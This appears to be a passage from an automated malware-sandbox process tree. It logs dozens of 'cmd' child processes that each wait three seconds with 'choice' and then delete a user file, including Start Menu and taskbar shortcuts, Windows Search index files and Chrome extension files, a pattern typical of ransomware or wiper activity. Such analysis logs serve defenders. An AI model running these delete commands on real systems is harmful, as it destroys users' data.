      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\tinytile.png"
      4⤵
      PID:5840
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4304
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\squaretile.png"
      4⤵
      PID:5900
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14692
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\tinytile.png"
      4⤵
      PID:6040
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:11380
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\squaretile.png"
      4⤵
      PID:6104
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14856
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\tinytile.png"
      4⤵
      PID:7180
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14452
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{8b119eff-4ed1-47a6-ab91-72a5834c3b26}\0.0.filtertrie.intermediate.txt"
      4⤵
      PID:7200
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15140
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{8b119eff-4ed1-47a6-ab91-72a5834c3b26}\0.1.filtertrie.intermediate.txt"
      4⤵
      PID:7216
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14864
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{8b119eff-4ed1-47a6-ab91-72a5834c3b26}\0.2.filtertrie.intermediate.txt"
      4⤵
      PID:7232
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14928
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{8dddecad-aff7-4b6a-8f46-ebc5546e6803}\0.0.filtertrie.intermediate.txt"
      4⤵
      PID:7260
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15460
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{8dddecad-aff7-4b6a-8f46-ebc5546e6803}\0.1.filtertrie.intermediate.txt"
      4⤵
      PID:7272
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16040
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{8dddecad-aff7-4b6a-8f46-ebc5546e6803}\0.2.filtertrie.intermediate.txt"
      4⤵
      PID:7292
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14468
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{facece79-4fdb-41eb-9f07-ff952681991b}\0.0.filtertrie.intermediate.txt"
      4⤵
      PID:7320
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14360
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{facece79-4fdb-41eb-9f07-ff952681991b}\0.1.filtertrie.intermediate.txt"
      4⤵
      PID:7340
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15280
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{facece79-4fdb-41eb-9f07-ff952681991b}\0.2.filtertrie.intermediate.txt"
      4⤵
      PID:7368
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:1284
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{dd282d2a-b45a-4cd5-9176-f709afbbc54d}\appsconversions.txt"
      4⤵
      PID:7420
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4100
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{dd282d2a-b45a-4cd5-9176-f709afbbc54d}\appsglobals.txt"
      4⤵
      PID:7456
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14540
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{dd282d2a-b45a-4cd5-9176-f709afbbc54d}\appssynonyms.txt"
      4⤵
      PID:7476
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14284
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{dd282d2a-b45a-4cd5-9176-f709afbbc54d}\settingsconversions.txt"
      4⤵
      PID:7508
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15524
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{dd282d2a-b45a-4cd5-9176-f709afbbc54d}\settingsglobals.txt"
      4⤵
      PID:7540
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2284
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{dd282d2a-b45a-4cd5-9176-f709afbbc54d}\settingssynonyms.txt"
      4⤵
      PID:7568
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4024
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{a6d57969-7825-478a-b7ac-83dc68d8319a}\0.0.filtertrie.intermediate.txt"
      4⤵
      PID:7588
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14756
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{a6d57969-7825-478a-b7ac-83dc68d8319a}\0.1.filtertrie.intermediate.txt"
      4⤵
      PID:7608
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16152
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{a6d57969-7825-478a-b7ac-83dc68d8319a}\0.2.filtertrie.intermediate.txt"
      4⤵
      PID:7620
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14936
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{a7b82f7c-73a1-4f1e-b6f0-3c377fa780a8}\0.0.filtertrie.intermediate.txt"
      4⤵
      PID:7640
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15440
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{a7b82f7c-73a1-4f1e-b6f0-3c377fa780a8}\0.1.filtertrie.intermediate.txt"
      4⤵
      PID:7652
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15600
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{a7b82f7c-73a1-4f1e-b6f0-3c377fa780a8}\0.2.filtertrie.intermediate.txt"
      4⤵
      PID:7664
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16180
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer.lnk"
      4⤵
      PID:7676
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15904
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk"
      4⤵
      PID:7688
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14420
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk"
      4⤵
      PID:7708
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14684
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk"
      4⤵
      PID:7728
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14428
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk"
      4⤵
      PID:7748
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15304
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk"
      4⤵
      PID:7768
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:1788
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk"
      4⤵
      PID:7792
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2152
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk"
      4⤵
      PID:7816
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15072
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Administrative Tools.lnk"
      4⤵
      PID:7836
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15344
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk"
      4⤵
      PID:7856
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14332
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk"
      4⤵
      PID:7868
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14652
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk"
      4⤵
      PID:7880
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3032
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk"
      4⤵
      PID:7896
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16048
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk"
      4⤵
      PID:7924
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14636
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk"
      4⤵
      PID:7948
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14400
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk"
      4⤵
      PID:7980
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15264
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.76.1_0\128.png"
      4⤵
      PID:8000
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15412
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.76.1_0\offscreendocument.html"
      4⤵
      PID:8016
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14840
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\JGTP21KH\www.bing[1].xml"
      4⤵
      PID:8032
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3204
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\M1A8XLO2\microsoft.windows[1].xml"
      4⤵
      PID:8056
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15560
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\craw_window.html"
      4⤵
      PID:8072
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14604
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_128.png"
      4⤵
      PID:8092
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15328
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png"
      4⤵
      PID:8112
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14612
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button.png"
      4⤵
      PID:8132
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16500
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_close.png"
      4⤵
      PID:8152
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15432
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_hover.png"
      4⤵
      PID:8180
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15056
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_maximize.png"
      4⤵
      PID:6188
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14912
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_pressed.png"
      4⤵
      PID:6440
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14628
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png"
      4⤵
      PID:6648
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14572
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png"
      4⤵
      PID:6932
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15296
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png"
      4⤵
      PID:8200
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4920
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png"
      4⤵
      PID:8220
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14804
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png"
      4⤵
      PID:8232
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14444
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png"
      4⤵
      PID:8244
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15500
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png"
      4⤵
      PID:8260
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2176
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png"
      4⤵
      PID:8288
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15192
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png"
      4⤵
      PID:8312
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:216
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png"
      4⤵
      PID:8324
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14904
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png"
      4⤵
      PID:8348
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4472
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png"
      4⤵
      PID:8368
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14668
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png"
      4⤵
      PID:8384
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4396
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png"
      4⤵
      PID:8412
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4208
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png"
      4⤵
      PID:8424
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14564
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png"
      4⤵
      PID:8436
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16196
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png"
      4⤵
      PID:8448
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14780
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png"
      4⤵
      PID:8464
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15624
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png"
      4⤵
      PID:8476
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15552
  - - C:\Windows\SYSTEM32\cmd.exe
